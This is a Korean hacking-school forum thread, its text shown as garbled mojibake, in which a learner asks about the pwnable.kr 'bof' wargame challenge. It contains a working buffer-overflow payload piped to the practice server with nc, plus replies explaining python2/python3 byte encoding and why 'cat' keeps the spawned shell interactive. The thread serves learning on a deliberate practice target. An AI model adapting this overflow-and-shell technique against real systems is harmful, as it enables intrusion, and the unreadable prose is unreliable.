½Ã½ºÅÛ ÇØÅ·

 1574, 3/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   hackxx123
   http://NULL
   pwnable.kr bof ¹®Á¦!!!

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1950 [º¹»ç]


½ºÅÃÀ» ÇϳªÇϳª ¼ÕÀ¸·Î ±×·Áº¸¸é¼­  ¿Ö ¿À¹öÇ÷ο찡 ¹ß»ýÇÏ´ÂÁö ±ú¿ìÃƽÀ´Ï´Ù. 52¹ÙÀÌÆ®¸¸Å­ ´õ¹Ì°ªÀ» ³Ö¾îÁÖ°í ¸¶Áö¸· 4¹ÙÀÌÆ®¿¡ ¿øÇÏ´Â Å°°ªÀ» ³Ö¾îÁÖ¸é Ç®¸®´Â ¹®Á¦Àä,, ±×·±µ¥,,,
ÆäÀ̷εå´Â (python -c "print('A'*52+'\xbe\xba\xfe\xca')";cat) | nc pwnable.kr 9000 Á¤´äÀÌ À̰ǵ¥ python3·Î´Â Á¤´äÀÌ ¾ÈÇ®¸³´Ï´Ù...
¹®¹ýÀº print¾Õ¿¡ ()¸¦ ³Ö°í ´ç¿¬È÷ ÇØÁᱸ¿ä µµµ¥Ã¼ ÀÌÇØ°¡ ¾ÈµÇ³×¿ä.. ¿Ö python3·Î´Â ¾ÈµÇ´Â°ÇÁö ±×¸®°í ÆÄÀ̽㠸í·ÉÀ» ÇØÁÖ°í ¸¶Áö¸·¿¡ ¿Ö ;cat ¸í·É¾î¸¦ ºÙÇôÁÖ´ÂÁö ¸ð¸£°Ú½À´Ï´Ù ; ´ÙÀ½ catÀÌ¸é ¿ÏÀü ºÐ¸®µÈ ¸í·É ¼öÇàÀΰɷΠ¾Æ´Âµ¥... ¿Ö Àú·¸°Ô ÇØÁÖ´ÂÁö.. ÀÎÅͳݿ¡ ³ª¿ÍÀÖ´Â Ç®À̸¦ ºÁµµ ¸ðµç±ÛÀÌ Àú ;catÀÌ ºÙÀº ÀÌÀ¯¸¦ ¾Ë·ÁÁÖÁö¸¦ ¾Ê³×¿ä.... Á¦¹ß ´©°¡ ¾Ë·ÁÁÖ¼¼¿ä ¤Ð¤Ð
  Hit : 2504     Date : 2018/12/12 12:09


    
cd80 ? ~ python2 -c 'print "\xbe\xba\xfe\xca"' | xxd -
00000000: beba feca 0a .....
? ~ python3 -c 'print("\xbe\xba\xfe\xca")' | xxd -
00000000: c2be c2ba c3be c38a 0a .........
? ~

À§ Â÷À̶§¹®¿¡ ¾ÈµÇ³ªº¸³×¿ä

catÀ» ºÙ¿©ÁÖ´Â ÀÌÀ¯´Â catÀ» ±×³É ½ÇÇàÇغ¸¸é
➜ ~ strace -if /bin/cat 2>&1 | grep -E "read|write"
[00007f384b2b2da4] read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
hi
[00007f384afb5081] read(0, "hi\n", 131072) = 3
[00007f384afb5154] write(1, "hi\n", 3hi
bye
[00007f384afb5081] read(0, "bye\n", 131072) = 4
[00007f384afb5154] write(1, "bye\n", 4bye
ÀÔ·ÂÇÑ°É ±×´ë·Î Ãâ·ÂÇÏ°í
cat) °ú nc »çÀÌÀÇ ÆÄÀÌÇÁ´Â ÆÄÀÌÇÁ ¿ÞÆíÀÇ stdoutÀ» ¿À¸¥ÆíÀÇ stdinÀ¸·Î ³Ö¾îÁÖ´Â ¿ªÇÒÀ̱⠶§¹®¿¡
¾Õ¿¡¼­ Ãâ·ÂÇÑ°ÍÀÌ bofÀÇ gets¿¡ µé¾î°¡ ½©ÀÌ ½ÇÇàµÇ°í ±× ÈÄ ¸í·ÉÀ» Ä¡±â À§ÇØ catÀ» ºÙ¿©¼­ ÀÔ·ÂÇϴ°͵éÀÌ ½©·Î Àü´ÞµÉ ¼ö ÀÖµµ·Ï ÇϱâÀ§ÇØ catÀ» ºÙÀÔ´Ï´Ù		 2018/12/12  
DOP4MIN3 p_str = {Ãâ·Â ¹®ÀÚ¿­}.decode('utf-8') 2018/12/23  
1534   shell code ÀÛ¼º[3]     turttle2s
 12/22 1786
1533   ½Ã½ºÅÛ ÇØÅ· Æ÷Æ®Æ÷¿öµù Áú¹®[5]     qwaszx587
 12/20 2038
1532   '½Ã½ºÅÛ ÇØÅ·' À̶ó´Â ¿ë¾î¿¡ ´ëÇؼ­[2]     choboKing
 12/15 2049
  pwnable.kr bof ¹®Á¦!!![2]     hackxx123
 12/12 2503
1530   ÅøÅ°µð °ü·Ã Áú¹Ã[2]     qwaszx587
 12/03 2038
1529   ½Ã½ºÅÛ ÇØÅ· : ¸®´ª½º ±âÃÊÆí(¾ÆÀÌÇǺ¸´Â¹ý)[1]     rjsdn1578
 11/03 3341
1528   FTZ level4 Áú¹®[8]     turttle2s
 11/02 1892
1527   RTLÁú¹®![1]     Sp4wn
 10/20 2112
1526   LOB ¼¼±×¸ÕÆ® µðÆúÆ® ¿À·ù.. Á» ¾Ë·ÁÁÖ¼¼¿ä ¤Ð[2]     qustkdrn
 10/06 1676
1525   argv[2]ÀÇ ÁÖ¼Ò¸¦ ¾Ë°í ½Í½À´Ï´Ù.[2]     ka0r1
 09/23 2336
1524   LOB °íºí¸° Ŭ¸®¾î Çß½À´Ï´Ù¸¸ ±Ã±ÝÇÑ°Ô Àֳ׿ä.[3]     ka0r1
 09/23 1911
1523   F.T.Z 14´Ü°è[4]     ka0r1
 09/21 1961
1522   L.O.B goblin[1]     ka0r1
 09/16 1939
1521   Æ÷¸Ë½ºÆ®¸µ Ãë¾àÁ¡ Áú¹®[1]     bufferover
 09/14 2795
1520   ftz level11¹ø ¹®Á¦¿¡ ´ëÇÑ Áú¹®ÀÌ ÀÖ½À´Ï´Ù.[3]     in_reason
 09/10 1877
1519   ftz level4 ÆÄÀÏÀÌ ¾È¸¸µé¾îÁý´Ï´Ù..[1]     m914
 08/20 1781
1518   ftz level5 ¸µÅ©¿À·ù?     don1004
 08/09 1849
1517   ¼¾Å佺¿¡¼­ ¸Æ ¿ø°ÝÁ¢¼Ó     ig0102
 07/21 1998
1516   FTZ level4¹ø ¹®Á¦ ±Ã±ÝÇÑ Á¡ÀÌ ÀÖ¾î Áú¹® µå¸³´Ï´Ù.     in_reason
 07/18 1744
1515   ftz ¸ÆÀ¸·Î ssh Á¢¼Ó [1]     bunggl
 06/30 2363
[1][2] 3 [4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org